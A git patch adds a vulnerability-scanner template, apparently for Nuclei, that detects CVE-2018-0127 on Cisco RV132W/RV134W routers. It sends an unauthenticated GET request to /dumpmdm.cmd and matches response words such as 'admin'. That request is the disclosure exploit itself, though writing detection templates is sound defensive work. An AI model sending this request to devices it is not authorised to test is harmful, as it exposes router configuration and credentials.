From 2b477061e8cdfbf550acc9610edaef4b278af331 Mon Sep 17 00:00:00 2001 From: Jackson Rolf Date: Fri, 1 Oct 2021 15:30:31 -0400 Subject: [PATCH] Added CVE-2018-0127 template. --- cves/2018/CVE-2018-0127.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2018/CVE-2018-0127.yaml diff --git a/cves/2018/CVE-2018-0127.yaml b/cves/2018/CVE-2018-0127.yaml new file mode 100644 index 0000000000..ab31e8d430 --- /dev/null +++ b/cves/2018/CVE-2018-0127.yaml @@ -0,0 +1,26 @@ +id: CVE-2018-0127 +info: + name: Cisco RV132W and RV134W Wireless VPN Routers Unauthenticated Information Disclosure Vulnerability + author: jrolf + severity: critical + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-0127 + description: Detects Cisco devices vulnerable to CVE-2018-0127 + tags: cve,cve2018,cisco + +requests: + - method: GET + path: + - "{{BaseURL}}/dumpmdm.cmd" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Dump" + - "MDM" + - "cisco" + - "admin" + part: body